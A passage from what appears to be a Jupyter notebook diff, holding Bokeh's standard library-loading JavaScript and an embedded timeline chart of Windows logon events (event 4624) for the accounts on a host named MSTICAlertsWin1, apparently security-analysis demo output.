cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"5492\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"5492\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"fb8392a3-5412-4cc2-95ca-bd031d691548\" data-root-id=\"5589\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"efae7d54-c0ab-494f-b948-ebe0ca5c6d45\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"5496\"},{\"id\":\"5539\"}]},\"id\":\"5589\",\"type\":\"Column\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"Row\"}},\"id\":\"5560\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"5623\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"5621\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"5624\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"5610\"},{\"id\":\"5611\"},{\"id\":\"5612\"},{\"id\":\"5613\"},{\"id\":\"5614\"},{\"id\":\"5615\"},{\"id\":\"5616\"},{\"id\":\"5617\"},{\"id\":\"5618\"},{\"id\":\"5619\"},{\"id\":\"5620\"},{\"id\":\"5621\"}]},\"id\":\"5508\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"5625\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"5595\",\"type\":\"AllLabels\"},{\"attributes\":{\"factors\":[\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\adm1nistrator\",\"NT AUTHORITY\\\\SYSTEM\"]},\"id\":\"5501\",\"type\":\"FactorRange\"},{\"attributes\":{},\"id\":\"5592\",\"type\":\"AllLabels\"},{\"attributes\":{\"axis_label\":\"Account\",\"formatter\":{\"id\":\"5594\"},\"major_label_policy\":{\"id\":\"5592\"},\"ticker\":{\"id\":\"5512\"}},\"id\":\"5511\",\"type\":\"CategoricalAxis\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@end_time\":\"datetime\",\"@start_time\":\"datetime\"},\"tooltips\":[[\"Account\",\"@Account\"],[\"start_time\",\"@start_time{%F %T.%3N}\"],[\"end_time\",\"@end_time{%F %T.%3N}\"]]},\"id\":\"5495\",\"type\":\"HoverTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"Row\"}},\"id\":\"5561\",\"type\":\"Circle\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"5626\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"5628\",\"type\":\"DaysTicker\"},{\"attributes\":{\"end\":1547531229369.95,\"start\":1547514633423.05},\"id\":\"5542\",\"type\":\"Range1d\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"5627\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"navy\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":5},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5533\"}}},\"id\":\"5535\",\"type\":\"Scatter\"},{\"attributes\":{},\"id\":\"5505\",\"type\":\"CategoricalScale\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"5629\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"5569\"},\"major_label_policy\":{\"id\":\"5595\"},\"ticker\":{\"id\":\"5508\"}},\"id\":\"5507\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"5569\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"5632\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"5546\",\"type\":\"LinearScale\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"5630\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"5631\",\"type\":\"DaysTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"5540\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"5594\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{\"axis\":{\"id\":\"5507\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"5510\",\"type\":\"Grid\"},{\"attributes\":{\"line_alpha\":0.5,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"5572\",\"type\":\"Line\"},{\"attributes\":{},\"id\":\"5602\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"5494\"},\"glyph\":{\"id\":\"5535\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5536\"},\"view\":{\"id\":\"5538\"}},\"id\":\"5537\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"5503\",\"type\":\"LinearScale\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"5633\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"5516\",\"type\":\"ResetTool\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"5518\",\"type\":\"PanTool\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"5634\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"5565\"},\"x_range\":{\"id\":\"5499\"},\"y_range\":null},\"id\":\"5564\",\"type\":\"RangeTool\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\adm1nistrator\",\"NT AUTHORITY\\\\SYSTEM\"],\"Center\":{\"__ndarray__\":\"ADCsnv2EdkIAsA/0/oR2QgBIrN/4hHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]},\"Row\":[0,1,2],\"Width\":{\"__ndarray__\":\"AAAAAAFJRUEAAAAAAAAAAAAAACB0WWhB\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]},\"end_time\":{\"__ndarray__\":\"AEA88/6EdkIAsA/0/oR2QgBQCfb+hHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]},\"index\":[0,1,2],\"start_time\":{\"__ndarray__\":\"ACAcSvyEdkIAsA/0/oR2QgBAT8nyhHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]}},\"selected\":{\"id\":\"5600\"},\"selection_policy\":{\"id\":\"5601\"}},\"id\":\"5493\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"5544\",\"type\":\"DataRange1d\"},{\"attributes\":{},\"id\":\"5604\",\"type\":\"Selection\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"5635\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"5558\"},\"glyph\":{\"id\":\"5560\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5561\"},\"view\":{\"id\":\"5563\"}},\"id\":\"5562\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"5636\",\"type\":\"YearsTicker\"},{\"attributes\":{\"source\":{\"id\":\"5493\"}},\"id\":\"5532\",\"type\":\"CDSView\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"5555\",\"type\":\"Title\"},{\"attributes\":{\"range\":null,\"value\":0.5},\"id\":\"5533\",\"type\":\"Dodge\"},{\"attributes\":{\"below\":[{\"id\":\"5507\"}],\"center\":[{\"id\":\"5510\"},{\"id\":\"5513\"},{\"id\":\"5576\"},{\"id\":\"5582\"},{\"id\":\"5588\"}],\"height\":300,\"left\":[{\"id\":\"5511\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"5531\"},{\"id\":\"5537\"},{\"id\":\"5574\"},{\"id\":\"5580\"},{\"id\":\"5586\"}],\"title\":{\"id\":\"5497\"},\"toolbar\":{\"id\":\"5520\"},\"width\":900,\"x_range\":{\"id\":\"5499\"},\"x_scale\":{\"id\":\"5503\"},\"y_range\":{\"id\":\"5501\"},\"y_scale\":{\"id\":\"5505\"}},\"id\":\"5496\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"formatter\":{\"id\":\"5556\"},\"major_label_policy\":{\"id\":\"5597\"},\"ticker\":{\"id\":\"5551\"}},\"id\":\"5550\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"5597\",\"type\":\"AllLabels\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"5585\",\"type\":\"Line\"},{\"attributes\":{\"source\":{\"id\":\"5494\"}},\"id\":\"5538\",\"type\":\"CDSView\"},{\"attributes\":{\"line_alpha\":0.5,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"5584\",\"type\":\"Line\"},{\"attributes\":{\"overlay\":{\"id\":\"5519\"}},\"id\":\"5515\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"5512\",\"type\":\"CategoricalTicker\"},{\"attributes\":{},\"id\":\"5517\",\"type\":\"SaveTool\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"5514\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"data\":{\"x\":[1547516548340.0,1547516548340.0],\"y\":[0,3]},\"selected\":{\"id\":\"5604\"},\"selection_policy\":{\"id\":\"5605\"}},\"id\":\"5571\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"5495\"},{\"id\":\"5514\"},{\"id\":\"5515\"},{\"id\":\"5516\"},{\"id\":\"5517\"},{\"id\":\"5518\"}]},\"id\":\"5520\",\"type\":\"Toolbar\"},{\"attributes\":{\"source\":{\"id\":\"5558\"}},\"id\":\"5563\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"5548\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"5606\",\"type\":\"Selection\"},{\"attributes\":{\"data\":{\"x\":[1547529306363.0,1547529306363.0],\"y\":[0,3]},\"selected\":{\"id\":\"5608\"},\"selection_policy\":{\"id\":\"5609\"}},\"id\":\"5583\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"MSTICAlertsWin1\\\\adm1nistrator\"],\"AuthenticationPackageName\":[\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"NTLM\"],\"Center\":{\"__ndarray__\":\"ADCsnv2EdkIAMKye/YR2QgBIrN/4hHZCAEis3/iEdkIASKzf+IR2QgBIrN/4hHZCAEis3/iEdkIASKzf+IR2QgBIrN/4hHZCAEis3/iEdkIASKzf+IR2QgBIrN/4hHZCAEis3/iEdkIAsA/0/oR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624],\"IpAddress\":[\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"fe80::38dc:e4a9:61bd:b458\"],\"LogonProcessName\":[\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"NtLmSsp \"],\"LogonType\":[4,4,5,5,5,5,5,5,5,5,5,5,5,3],\"Row\":[0,0,2,2,2,2,2,2,2,2,2,2,2,1],\"SourceComputerId\":[\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\"],\"Status\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fw==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"SubjectDomainName\":[\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"-\"],\"SubjectUserName\":[\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"-\"],\"SubjectUserSid\":[\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-0-0\"],\"TargetDomainName\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"MSTICAlertsWin1\"],\"TargetLogonId\":[\"0xfaac27\",\"0xf0c9d6\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfb5ee6\"],\"TargetUserName\":[\"MSTICAdmin\",\"MSTICAdmin\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"adm1nistrator\"],\"TargetUserSid\":[\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-1066\"],\"TenantId\":[\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\"],\"TimeGenerated\":{\"__ndarray__\":\"AEA88/6EdkIAIBxK/IR2QgBwm/P+hHZCANAl9f6EdkIAUAn2/oR2QgAQs3j4hHZCAFBFefiEdkIAEE1p9oR2QgDw3mn2hHZCAEBPyfKEdkIAoBn08oR2QgCQ2sj3hHZCALBtyfeEdkIAsA/0/oR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"Width\":{\"__ndarray__\":\"AAAAAAFJRUEAAAAAAUlFQQAAACB0WWhBAAAAIHRZaEEAAAAgdFloQQAAACB0WWhBAAAAIHRZaEEAAAAgdFloQQAAACB0WWhBAAAAIHRZaEEAAAAgdFloQQAAACB0WWhBAAAAIHRZaEEAAAAAAAAAAA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"WorkstationName\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"MSTICAlertsWin1\"],\"end_time\":{\"__ndarray__\":\"AEA88/6EdkIAQDzz/oR2QgBQCfb+hHZCAFAJ9v6EdkIAUAn2/oR2QgBQCfb+hHZCAFAJ9v6EdkIAUAn2/oR2QgBQCfb+hHZCAFAJ9v6EdkIAUAn2/oR2QgBQCfb+hHZCAFAJ9v6EdkIAsA/0/oR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13],\"start_time\":{\"__ndarray__\":\"ACAcSvyEdkIAIBxK/IR2QgBAT8nyhHZCAEBPyfKEdkIAQE/J8oR2QgBAT8nyhHZCAEBPyfKEdkIAQE/J8oR2QgBAT8nyhHZCAEBPyfKEdkIAQE/J8oR2QgBAT8nyhHZCAEBPyfKEdkIAsA/0/oR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]}},\"selected\":{\"id\":\"5602\"},\"selection_policy\":{\"id\":\"5603\"}},\"id\":\"5494\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":5},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5533\"}}},\"id\":\"5536\",\"type\":\"Scatter\"},{\"attributes\":{\"data_source\":{\"id\":\"5493\"},\"glyph\":{\"id\":\"5529\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5530\"},\"view\":{\"id\":\"5532\"}},\"id\":\"5531\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"5605\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"5603\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"sou